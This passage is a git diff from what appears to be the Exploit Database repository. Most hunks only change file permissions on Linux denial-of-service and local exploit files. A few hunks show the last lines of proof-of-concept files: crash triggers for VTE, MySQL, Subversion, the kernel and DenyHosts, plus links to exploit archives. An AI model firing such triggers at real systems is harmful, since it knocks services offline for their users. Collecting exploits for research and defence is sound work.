b/platforms/linux/dos/37477.txt @@ -4,4 +4,4 @@ VTE is prone to a vulnerability that may allow attackers to cause an affected ap echo -en "\e[2147483647L" echo -en "\e[2147483647M" -echo -en "\e[2147483647P" \ No newline at end of file +echo -en "\e[2147483647P" \ No newline at end of file diff --git a/platforms/linux/dos/37663.txt b/platforms/linux/dos/37663.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/3769.c b/platforms/linux/dos/3769.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37706.txt b/platforms/linux/dos/37706.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37777.txt b/platforms/linux/dos/37777.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37783.c b/platforms/linux/dos/37783.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37839.txt b/platforms/linux/dos/37839.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37866.txt b/platforms/linux/dos/37866.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37867.txt b/platforms/linux/dos/37867.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37869.txt b/platforms/linux/dos/37869.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37870.txt b/platforms/linux/dos/37870.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/37897.html b/platforms/linux/dos/37897.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/3807.c b/platforms/linux/dos/3807.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/38145.txt b/platforms/linux/dos/38145.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/38365.txt b/platforms/linux/dos/38365.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/38392.txt b/platforms/linux/dos/38392.txt old mode 100755 new mode 100644 index 5f03f0adc..9c8564064 --- a/platforms/linux/dos/38392.txt +++ b/platforms/linux/dos/38392.txt @@ -4,4 +4,4 @@ MySQL and MariaDB are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. -"select astext(0x0100000000030000000100000000000010);" \ No newline at end of file +"select astext(0x0100000000030000000100000000000010);" \ No newline at end of file diff --git a/platforms/linux/dos/38421.txt b/platforms/linux/dos/38421.txt old mode 100755 new mode 100644 index 2aeacdd13..61e3588d0 --- a/platforms/linux/dos/38421.txt +++ b/platforms/linux/dos/38421.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o Apache Subversion versions 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 are vulnerable. -curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo' \ No newline at end of file +curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo' \ No newline at end of file diff --git a/platforms/linux/dos/38422.txt b/platforms/linux/dos/38422.txt old mode 100755 new mode 100644 index e7a6fb1e1..05bb8104e --- a/platforms/linux/dos/38422.txt +++ b/platforms/linux/dos/38422.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o Apache Subversion versions 1.7.0 through 1.7.8 are vulnerable. -curl -X REPORT --data-binary @log_report 'http://www.example.com/repo/!svn/bc/1/' \ No newline at end of file +curl -X REPORT --data-binary @log_report 'http://www.example.com/repo/!svn/bc/1/' \ No newline at end of file diff --git a/platforms/linux/dos/38465.txt b/platforms/linux/dos/38465.txt old mode 100755 new mode 100644 index 0fd762775..557895ea4 --- a/platforms/linux/dos/38465.txt +++ b/platforms/linux/dos/38465.txt @@ -5,4 +5,4 @@ The Linux kernel is prone to multiple local denial-of-service vulnerabilities. Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition. cd /sys/kernel/debug/tracing -echo 1234 | sudo tee -a set_ftrace_pid \ No newline at end of file +echo 1234 | sudo tee -a set_ftrace_pid \ No newline at end of file diff --git a/platforms/linux/dos/38589.c b/platforms/linux/dos/38589.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/38620.txt b/platforms/linux/dos/38620.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/38622.txt b/platforms/linux/dos/38622.txt old mode 100755 new mode 100644 index 4b5d24294..1e0c3c55b --- a/platforms/linux/dos/38622.txt +++ b/platforms/linux/dos/38622.txt @@ -4,4 +4,4 @@ libvirt is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the application that uses the affected library, denying service to legitimate users. -# virsh -c qemu:///system --readonly iface-list --inactive \ No newline at end of file +# virsh -c qemu:///system --readonly iface-list --inactive \ No newline at end of file diff --git a/platforms/linux/dos/38778.txt b/platforms/linux/dos/38778.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/38857.txt b/platforms/linux/dos/38857.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/38909.txt b/platforms/linux/dos/38909.txt old mode 100755 new mode 100644 index 25ab4756a..9994dda54 --- a/platforms/linux/dos/38909.txt +++ b/platforms/linux/dos/38909.txt @@ -4,4 +4,4 @@ DenyHosts is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users. -ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21 \ No newline at end of file +ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21 \ No newline at end of file diff --git a/platforms/linux/dos/39229.cpp b/platforms/linux/dos/39229.cpp old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39308.c b/platforms/linux/dos/39308.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39445.c b/platforms/linux/dos/39445.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39454.txt b/platforms/linux/dos/39454.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39491.txt b/platforms/linux/dos/39491.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39492.txt b/platforms/linux/dos/39492.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39493.txt b/platforms/linux/dos/39493.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39494.txt b/platforms/linux/dos/39494.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39505.c b/platforms/linux/dos/39505.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39537.txt b/platforms/linux/dos/39537.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39538.txt b/platforms/linux/dos/39538.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39539.txt b/platforms/linux/dos/39539.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39540.txt b/platforms/linux/dos/39540.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39541.txt b/platforms/linux/dos/39541.txt old mode 100755 new mode 100644 index 07b0ff1fa..f5317ac3a --- a/platforms/linux/dos/39541.txt +++ b/platforms/linux/dos/39541.txt @@ -638,4 +638,4 @@ Arduino Leonardo Firmware: :101824000A005B48455844554D505D0A0D0025306B :041834003258200006 :00000001FF --- \ No newline at end of file +-- \ No newline at end of file diff --git a/platforms/linux/dos/39542.txt b/platforms/linux/dos/39542.txt old mode 100755 new mode 100644 index 852522757..18c41b0c2 --- a/platforms/linux/dos/39542.txt +++ b/platforms/linux/dos/39542.txt @@ -643,4 +643,4 @@ Arduino Leonardo Firmware: :101824000A005B48455844554D505D0A0D0025306B :041834003258200006 :00000001FF --- \ No newline at end of file +-- \ No newline at end of file diff --git a/platforms/linux/dos/39543.txt b/platforms/linux/dos/39543.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39544.txt b/platforms/linux/dos/39544.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39545.txt b/platforms/linux/dos/39545.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39555.txt b/platforms/linux/dos/39555.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39556.txt b/platforms/linux/dos/39556.txt old mode 100755 new mode 100644 index d0bdd6c92..b773d629d --- a/platforms/linux/dos/39556.txt +++ b/platforms/linux/dos/39556.txt @@ -637,4 +637,4 @@ Arduino Leonardo Firmware: :101820000A005B48455844554D505D0A0D0025306F :04183000325820000A :00000001FF --- \ No newline at end of file +-- \ No newline at end of file diff --git a/platforms/linux/dos/39638.txt b/platforms/linux/dos/39638.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39733.py b/platforms/linux/dos/39733.py index b6078c8b0..676fb5e10 100755 --- a/platforms/linux/dos/39733.py +++ b/platforms/linux/dos/39733.py @@ -32,5 +32,4 @@ def main(): if __name__ == "__main__": - main() - \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/linux/dos/39773.txt b/platforms/linux/dos/39773.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39800.txt b/platforms/linux/dos/39800.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39842.txt b/platforms/linux/dos/39842.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39940.txt b/platforms/linux/dos/39940.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39941.txt b/platforms/linux/dos/39941.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39942.txt b/platforms/linux/dos/39942.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39943.txt b/platforms/linux/dos/39943.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39944.txt b/platforms/linux/dos/39944.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/39961.txt b/platforms/linux/dos/39961.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40181.c b/platforms/linux/dos/40181.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40230.txt b/platforms/linux/dos/40230.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40291.txt b/platforms/linux/dos/40291.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40419.c b/platforms/linux/dos/40419.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40695.c b/platforms/linux/dos/40695.c old mode 100755 new mode 100644 index cefb87880..934438f4c --- a/platforms/linux/dos/40695.c +++ b/platforms/linux/dos/40695.c @@ -42,4 +42,4 @@ s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s3.connect((sys.argv[1],int(sys.argv[2]))) s3.sendall(get_packet) s3.recv(1024) -s3.close() \ No newline at end of file +s3.close() \ No newline at end of file diff --git a/platforms/linux/dos/40696.c b/platforms/linux/dos/40696.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40697.c b/platforms/linux/dos/40697.c old mode 100755 new mode 100644 index 4776fc42f..0af3b69d6 --- a/platforms/linux/dos/40697.c +++ b/platforms/linux/dos/40697.c @@ -16,4 +16,4 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],int(sys.argv[2]))) s.sendall(packet) print s.recv(1024) -s.close() \ No newline at end of file +s.close() \ No newline at end of file diff --git a/platforms/linux/dos/40731.c b/platforms/linux/dos/40731.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40762.c b/platforms/linux/dos/40762.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40790.txt b/platforms/linux/dos/40790.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40819.c b/platforms/linux/dos/40819.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/40985.txt b/platforms/linux/dos/40985.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41350.c b/platforms/linux/dos/41350.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41457.c b/platforms/linux/dos/41457.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41715.txt b/platforms/linux/dos/41715.txt old mode 100755 new mode 100644 index 71b13c0dd..c55430f19 --- a/platforms/linux/dos/41715.txt +++ b/platforms/linux/dos/41715.txt @@ -132,10 +132,4 @@ ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsysca Tested on: =============== -Linux Ubuntu x86_64 - - - - - - \ No newline at end of file +Linux Ubuntu x86_64 \ No newline at end of file diff --git a/platforms/linux/dos/41767.txt b/platforms/linux/dos/41767.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41768.txt b/platforms/linux/dos/41768.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41769.txt b/platforms/linux/dos/41769.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41781.c b/platforms/linux/dos/41781.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41893.txt b/platforms/linux/dos/41893.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/41898.txt b/platforms/linux/dos/41898.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42048.c b/platforms/linux/dos/42048.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42103.js b/platforms/linux/dos/42103.js old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42110.txt b/platforms/linux/dos/42110.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42115.txt b/platforms/linux/dos/42115.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42136.c b/platforms/linux/dos/42136.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42137.txt b/platforms/linux/dos/42137.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42138.txt b/platforms/linux/dos/42138.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42139.txt b/platforms/linux/dos/42139.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42147.txt b/platforms/linux/dos/42147.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42148.txt b/platforms/linux/dos/42148.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42162.txt b/platforms/linux/dos/42162.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42198.txt b/platforms/linux/dos/42198.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42199.txt b/platforms/linux/dos/42199.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42200.txt b/platforms/linux/dos/42200.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42201.txt b/platforms/linux/dos/42201.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42202.txt b/platforms/linux/dos/42202.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42203.txt b/platforms/linux/dos/42203.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42204.txt b/platforms/linux/dos/42204.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42207.txt b/platforms/linux/dos/42207.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42258.txt b/platforms/linux/dos/42258.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42259.txt b/platforms/linux/dos/42259.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42299.txt b/platforms/linux/dos/42299.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42300.txt b/platforms/linux/dos/42300.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42301.txt b/platforms/linux/dos/42301.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42386.txt b/platforms/linux/dos/42386.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42389.txt b/platforms/linux/dos/42389.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42390.txt b/platforms/linux/dos/42390.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42391.txt b/platforms/linux/dos/42391.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42396.txt b/platforms/linux/dos/42396.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42397.txt b/platforms/linux/dos/42397.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42398.txt b/platforms/linux/dos/42398.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42399.txt b/platforms/linux/dos/42399.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42400.txt b/platforms/linux/dos/42400.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42409.txt b/platforms/linux/dos/42409.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42433.txt b/platforms/linux/dos/42433.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/42546.txt b/platforms/linux/dos/42546.txt old mode 100755 new mode 100644 index aa755cf5d..8bfeec51e --- a/platforms/linux/dos/42546.txt +++ b/platforms/linux/dos/42546.txt @@ -584,4 +584,4 @@ CVE-2017-12954 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42546.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42546.zip \ No newline at end of file diff --git a/platforms/linux/dos/42600.txt b/platforms/linux/dos/42600.txt old mode 100755 new mode 100644 index 7511fa15f..b03ace6f7 --- a/platforms/linux/dos/42600.txt +++ b/platforms/linux/dos/42600.txt @@ -83,4 +83,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42600.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42600.zip \ No newline at end of file diff --git a/platforms/linux/dos/42652.txt b/platforms/linux/dos/42652.txt old mode 100755 new mode 100644 index 48185c067..36ea48c4f --- a/platforms/linux/dos/42652.txt +++ b/platforms/linux/dos/42652.txt @@ -80,4 +80,4 @@ eflags=0x000102 /lib/i386-linux-gnu/libgcc_s.so.1=0xb7a33000 /lib/i386-linux-gnu/libm.so.6=0xb7c2e000 /lib/i386-linux-gnu/libc.so.6=0xb7a77000 -/lib/ld-linux.so.2=0xb7a51000> +/lib/ld-linux.so.2=0xb7a51000> \ No newline at end of file diff --git a/platforms/linux/dos/42762.txt b/platforms/linux/dos/42762.txt old mode 100755 new mode 100644 index 0a5eb101c..afc7baca7 --- a/platforms/linux/dos/42762.txt +++ b/platforms/linux/dos/42762.txt @@ -294,4 +294,4 @@ bt.recv() DEMO: -https://imgur.com/a/zcvLb +https://imgur.com/a/zcvLb \ No newline at end of file diff --git a/platforms/linux/dos/42932.c b/platforms/linux/dos/42932.c old mode 100755 new mode 100644 index 8b55e6e35..7fe1f6812 --- a/platforms/linux/dos/42932.c +++ b/platforms/linux/dos/42932.c @@ -142,4 +142,4 @@ c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa Reference: [1] https://patchwork.kernel.org/patch/9923803/ -[2] https://github.com/google/syzkaller +[2] https://github.com/google/syzkaller \ No newline at end of file diff --git a/platforms/linux/dos/42970.txt b/platforms/linux/dos/42970.txt old mode 100755 new mode 100644 index 7ee71f716..247ec163b --- a/platforms/linux/dos/42970.txt +++ b/platforms/linux/dos/42970.txt @@ -109,4 +109,4 @@ https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-r Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip \ No newline at end of file diff --git a/platforms/linux/dos/43010.c b/platforms/linux/dos/43010.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/43014.txt b/platforms/linux/dos/43014.txt old mode 100755 new mode 100644 index 2721eb663..3b8ff1be0 --- a/platforms/linux/dos/43014.txt +++ b/platforms/linux/dos/43014.txt @@ -283,4 +283,4 @@ which would mean that this is a potentially exploitable issue in release builds. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43014.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43014.zip \ No newline at end of file diff --git a/platforms/linux/dos/4732.c b/platforms/linux/dos/4732.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/4893.c b/platforms/linux/dos/4893.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/5210.c b/platforms/linux/dos/5210.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/5458.txt b/platforms/linux/dos/5458.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/551.c b/platforms/linux/dos/551.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/6689.txt b/platforms/linux/dos/6689.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/6704.txt b/platforms/linux/dos/6704.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/6718.html b/platforms/linux/dos/6718.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/68.c b/platforms/linux/dos/68.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/685.c b/platforms/linux/dos/685.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/686.c b/platforms/linux/dos/686.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/690.c b/platforms/linux/dos/690.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/691.c b/platforms/linux/dos/691.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/692.c b/platforms/linux/dos/692.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/7091.c b/platforms/linux/dos/7091.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/7150.html b/platforms/linux/dos/7150.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/7405.c b/platforms/linux/dos/7405.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/7454.c b/platforms/linux/dos/7454.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/789.c b/platforms/linux/dos/789.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/815.c b/platforms/linux/dos/815.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/842.c b/platforms/linux/dos/842.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/8469.c b/platforms/linux/dos/8469.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/8982.txt b/platforms/linux/dos/8982.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/904.c b/platforms/linux/dos/904.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/911.c b/platforms/linux/dos/911.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/9265.c b/platforms/linux/dos/9265.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/9442.c b/platforms/linux/dos/9442.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/957.c b/platforms/linux/dos/957.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/958.c b/platforms/linux/dos/958.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/959.c b/platforms/linux/dos/959.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/9901.txt b/platforms/linux/dos/9901.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/998.c b/platforms/linux/dos/998.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/999.c b/platforms/linux/dos/999.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/10038.txt b/platforms/linux/local/10038.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1009.c b/platforms/linux/local/1009.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1029.c b/platforms/linux/local/1029.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/10313.c b/platforms/linux/local/10313.c old mode 100755 new mode 100644 index 6ef77efc0..f203ff95f --- a/platforms/linux/local/10313.c +++ b/platforms/linux/local/10313.c @@ -261,5 +261,4 @@ int main() } return 0; -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/104.c b/platforms/linux/local/104.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/10487.txt b/platforms/linux/local/10487.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/106.c b/platforms/linux/local/106.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/10613.c b/platforms/linux/local/10613.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1170.c b/platforms/linux/local/1170.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1181.c b/platforms/linux/local/1181.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1187.c b/platforms/linux/local/1187.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/12.c b/platforms/linux/local/12.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/120.c b/platforms/linux/local/120.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1215.c b/platforms/linux/local/1215.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1267.c b/platforms/linux/local/1267.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/129.asm b/platforms/linux/local/129.asm old mode 100755 new mode 100644 diff --git a/platforms/linux/local/131.c b/platforms/linux/local/131.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1310.txt b/platforms/linux/local/1310.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1397.c b/platforms/linux/local/1397.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/140.c b/platforms/linux/local/140.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/141.c b/platforms/linux/local/141.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1415.c b/platforms/linux/local/1415.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/142.c b/platforms/linux/local/142.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1425.c b/platforms/linux/local/1425.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/144.c b/platforms/linux/local/144.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1445.c b/platforms/linux/local/1445.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1449.c b/platforms/linux/local/1449.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/145.c b/platforms/linux/local/145.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/14814.c b/platforms/linux/local/14814.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15150.c b/platforms/linux/local/15150.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15155.c b/platforms/linux/local/15155.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1518.c b/platforms/linux/local/1518.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/152.c b/platforms/linux/local/152.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15274.txt b/platforms/linux/local/15274.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15285.c b/platforms/linux/local/15285.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15304.txt b/platforms/linux/local/15304.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15344.c b/platforms/linux/local/15344.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/154.c b/platforms/linux/local/154.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15481.c b/platforms/linux/local/15481.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15704.c b/platforms/linux/local/15704.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15745.txt b/platforms/linux/local/15745.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15774.c b/platforms/linux/local/15774.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/15944.c b/platforms/linux/local/15944.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1596.txt b/platforms/linux/local/1596.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/160.c b/platforms/linux/local/160.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/16086.txt b/platforms/linux/local/16086.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/17147.txt b/platforms/linux/local/17147.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/17391.c b/platforms/linux/local/17391.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/17787.c b/platforms/linux/local/17787.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/178.c b/platforms/linux/local/178.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/17932.c b/platforms/linux/local/17932.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/17942.c b/platforms/linux/local/17942.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/180.c b/platforms/linux/local/180.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18040.c b/platforms/linux/local/18040.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18080.c b/platforms/linux/local/18080.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18086.c b/platforms/linux/local/18086.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18147.c b/platforms/linux/local/18147.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/183.c b/platforms/linux/local/183.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/1831.txt b/platforms/linux/local/1831.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18411.c b/platforms/linux/local/18411.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18783.txt b/platforms/linux/local/18783.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18785.txt b/platforms/linux/local/18785.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/18917.txt b/platforms/linux/local/18917.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19070.txt b/platforms/linux/local/19070.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19071.txt b/platforms/linux/local/19071.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19072.txt b/platforms/linux/local/19072.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19073.txt b/platforms/linux/local/19073.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19074.txt b/platforms/linux/local/19074.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19077.c b/platforms/linux/local/19077.c old mode 100755 new mode 100644 index 016f7c83b..5cf062a98 --- 